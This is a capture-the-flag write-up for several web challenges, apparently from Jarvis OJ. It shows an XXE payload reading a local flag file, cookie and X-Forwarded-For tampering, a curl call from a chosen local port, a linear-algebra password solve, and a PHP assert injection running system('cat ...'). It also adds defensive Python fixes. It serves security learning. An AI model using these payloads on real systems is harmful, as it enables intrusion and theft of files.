All content and knowledge points in this write-up come from the authors of the referenced materials.

API Call 100

URL: http://web.jarvisoj.com:9882/

View the page source.

The script portion is as follows.

<script>
function XHR() {
    var xhr;
    try {xhr = new XMLHttpRequest();}
    catch(e) {
        var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
        for (var i=0,len=IEXHRVers.length;i< len;i++) {
            try {xhr = new ActiveXObject(IEXHRVers[i]);}
            catch(e) {continue;}
        }
    }
    return xhr;
}

function send(){
    evil_input = document.getElementById("evil-input").value;
    var xhr = XHR();
    xhr.open("post","/api/v1.0/try",true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState==4 && xhr.status==201) {
            data = JSON.parse(xhr.responseText); // JSON format
            tip_area = document.getElementById("tip-area");
            tip_area.value = data.task.search+data.task.value;
        }
    };
    xhr.setRequestHeader("Content-Type","application/json");
    xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
</script>

The JS code above wraps our input in JSON and sends it to the server.

XXE

This challenge tests exploitation of an XXE vulnerability.
https://www.freebuf.com/articles/web/126788.html
https://security.tencent.com/index.php/blog/msg/69

By default this challenge sends its data as JSON.
Change the Content-Type.

Content-Type
MediaType, i.e. Internet Media Type, is also called a MIME type. In HTTP message headers, Content-Type indicates the media type of the specific request.

Common media types:
text/html: HTML format
text/plain: plain text format
text/xml: XML format
image/gif: GIF image format
image/jpeg: JPG image format
image/png: PNG image format
Media types beginning with application:
application/xhtml+xml: XHTML format
application/xml: XML data format
application/atom+xml: Atom XML feed format
application/json: JSON data format
application/pdf: PDF format
application/msword: Word document format
application/octet-stream: binary stream data (such as common file downloads)

So the data to send should be:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

The final request is as follows.

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: test/xml
Content-Length: 111
Connection: close
Referer: http://web.jarvisoj.com:9882/

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

The response comes back and contains the flag.

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 38
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Fri, 06 Mar 2020 08:16:53 GMT

<c>CTF{XxE_15_n0T_S7range_Enough}
</c>
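
Seen from the server side, the fix is to dispatch on an allowlisted Content-Type and to refuse any DOCTYPE before entities are resolved. The following is an added example, not code from the challenge or the original write-up; `handle_try`, `parse_xml_no_dtd` and the response shape are assumptions modelled on the page's `/api/v1.0/try` endpoint, and it goes slightly beyond the page by also covering an endpoint that must accept XML.

```python
import json
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE (and so may declare entities)."""

def parse_xml_no_dtd(data):
    """Return the document's text content; refuse any DOCTYPE up front."""
    chunks = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before the internal subset (the ENTITY declarations) is read.
        raise DTDForbidden("DOCTYPE %r rejected" % name)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)

def handle_try(content_type, body):
    """Hypothetical stand-in for POST /api/v1.0/try: returns (status, payload)."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type == "application/json":
        try:
            search = json.loads(body)["search"]
        except (ValueError, KeyError, TypeError):
            return 400, "malformed JSON"
    elif media_type in ("application/xml", "text/xml"):
        try:
            search = parse_xml_no_dtd(body)
        except DTDForbidden:
            return 400, "DOCTYPE rejected"
        except expat.ExpatError:
            return 400, "malformed XML"
    else:
        # Unknown types are refused instead of being handed to some parser.
        return 415, "unsupported media type"
    return 201, {"task": {"search": search, "value": "own"}}

# Constructed sample: the XML body shown in the write-up.
PAGE_PAYLOAD = (b'<?xml version="1.0"?>\n<!DOCTYPE a [\n'
                b'<!ENTITY data SYSTEM "file:///home/ctf/flag.txt">\n]>\n'
                b'<c>&data;</c>')

if __name__ == "__main__":
    print(handle_try("test/xml", PAGE_PAYLOAD))   # media type as sent on the page
    print(handle_try("text/xml", PAGE_PAYLOAD))
```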

admin 100

URL: http://web.jarvisoj.com:32792/
The page shows only "hello world", so scan its directories.
Send a request first, capture it in Burp, then right-click and choose Send to Spider; this finds a robots.txt file.

The robots.txt file
Reference link: https://zh.wikipedia.org/wiki/Robots.txt
An ASCII-encoded text file stored in the root directory of a website.

The robots.txt file lists admin_s3cr3t.php.
Visiting it shows a fake flag. Capture the request and send it to Repeater: there is an admin=0 field. Change it to admin=1 to get a flag.

HTTP/1.1 200 OK
Date: Fri, 06 Mar 2020 08:53:19 GMT
Server: Apache/2.4.18 (Unix) OpenSSL/1.0.2h PHP/5.6.21 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.21
Set-Cookie: admin=0
Content-Length: 21
Connection: close
Content-Type: text/html; charset=UTF-8

flag{hello_admin~}
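
The response above hands the role to the client as a bare `admin=0` cookie, so the server has no way to tell an edited value from the one it issued. The following added example (not part of the challenge or the original write-up) shows one mitigation, an HMAC tag over the cookie value; `SECRET_KEY`, `issue_cookie` and `is_admin` are hypothetical names, and the key is a constructed demo value.

```python
import hashlib
import hmac

# Assumption: in a real deployment this key comes from a secret store.
SECRET_KEY = b"constructed-demo-key"

def _tag(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()

def issue_cookie(admin):
    """Build the cookie value: 'admin=<0|1>.<hex HMAC-SHA256 of the payload>'."""
    payload = "admin=%d" % int(bool(admin))
    return payload + "." + _tag(payload)

def is_admin(cookie):
    """Grant admin only if the tag matches what the server itself issued."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return False  # bare 'admin=1' with no tag, as in the challenge
    # Constant-time comparison avoids leaking how much of the tag matched.
    if not hmac.compare_digest(tag.encode(), _tag(payload).encode()):
        return False
    return payload == "admin=1"

if __name__ == "__main__":
    issued = issue_cookie(False)
    forged = issued.replace("admin=0", "admin=1", 1)  # the edit made in the write-up
    print(is_admin(issued), is_admin(forged), is_admin(issue_cookie(True)))
```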

PORT51 100

URL: http://web.jarvisoj.com:32770/
The challenge asks us to access it from port 51. So on Kali, use the command:

curl --local-port 51  http://web.jarvisoj.com:32770/
PCTF{M45t3r_oF_CuRl}

Reference link:
https://www.cnblogs.com/duhuo/p/5695256.html

LOCALHOST 150

URL: http://web.jarvisoj.com:32774/

The challenge asks for localhost, meaning the request must come from the local machine.
The X-Forwarded-For HTTP header can indicate the current client IP.

Reference links:
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/X-Forwarded-For
https://www.jianshu.com/p/792048d08ebc

Send:

GET / HTTP/1.1
Host: web.jarvisoj.com:32774
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101
...

Result:

<body>
<h3>Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}</h3>
</body>
</html>
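
The check in this challenge trusts whatever X-Forwarded-For the client sends. The following added example (not the challenge's code and not from the original write-up) derives the client address from the TCP peer and consults the header only when the peer is a known proxy; `TRUSTED_PROXIES`, `client_ip` and `is_local_request` are hypothetical names, and all addresses are constructed.

```python
import ipaddress

# Assumption: the only hosts allowed to set X-Forwarded-For for us.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def _is_trusted(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip(peer_addr, xff_header=None):
    """Return the address access decisions should be based on."""
    # A header sent over a direct connection is client-controlled: ignore it.
    if not xff_header or not _is_trusted(peer_addr):
        return peer_addr
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    # Walk right to left: entries appended by our proxies are trustworthy,
    # the first entry that is not one of our proxies is the real client.
    for hop in reversed(hops):
        if _is_trusted(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return peer_addr  # malformed entry: fall back to the peer
        return hop
    return peer_addr

def is_local_request(peer_addr, xff_header=None):
    return ipaddress.ip_address(client_ip(peer_addr, xff_header)).is_loopback

if __name__ == "__main__":
    # The request from the write-up, arriving directly from a remote host.
    print(is_local_request("203.0.113.7", "127.0.0.1"))
```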

WEB? 150

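URL: http://web.jarvisoj.com:9891/

The challenge asks for a password, so the task is to find it. A wrong input returns Wrong Password!!
Viewing the source shows a suspicious app.js containing a lot of code. Search it directly for Wrong Password!!
This leads to the key function; on a close look it is the encryption part.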

value:function(e){
if(25!==e.length)
return!1;
for(var t=[],n=0;n<25;n++)
t.push(e.charCodeAt(n));
for(var r=[325799, ... ],
o=[[11, ...],
...],n=0;n<25;n++)
{
for(var i=0,a=0;a<25;a++)
i+=t[a]*o[n][a];
if(i!==r[n])
return!1
}
return!0
},}
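o is a two-dimensional array and r is one-dimensional.
This amounts to solving a linear system, b = x*a; x = b/a:
r[n] = sum over a of t[a]*o[n][a], i.e. r = o·t;
so t = o⁻¹·r (informally, t = r / o).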

Python provides a way to solve linear equations:
https://blog.csdn.net/HackerTom/article/details/98519196
https://zhuanlan.zhihu.com/p/24893371
The script is as follows.

# utf-8
# python-3
import numpy
r = numpy.array([325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259])
o=numpy.array([[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],
[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],
[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],
[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],
[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],
[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],
[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],
[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],
[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],
[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],
[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],
[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],
[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],
[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],
[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],
[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],
[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],
[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],
[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],
[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],
[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],
[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],
[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],
[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],
[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]])
x = numpy.linalg.solve(o, r)  # the solved x is an array of floats
flag = ''
for i in x:
    flag += chr(int(round(i)))  # round() returns the float rounded to the nearest integer
print(flag)
print(x)

QWB{R3ac7_1s_interesting}

babyphp 200

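The challenge is a website. Scanning its directories with Burp Suite reveals a flag page, but it is commented out.
According to other people's write-ups, this is a Git information leak. GitHack can download the code.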

Reference: https://github.com/lijiejie/GitHack
python GitHack.py http://web.jarvisoj.com:32798/.git/

After downloading, look at index.php: the page parameter (which defaults to home) can be injected.

The source is as follows:
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}

$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");

Here assert is a dangerous function; its prototype is:

bool assert ( mixed $assertion [, string $description ] )

If assertion is a string, assert() evaluates it as PHP code.
PHP injection reference

Use:

?page=flag'.system("cat templates/flag.php;").'

The page returns That file doesn't exist!
View the page source to get the flag.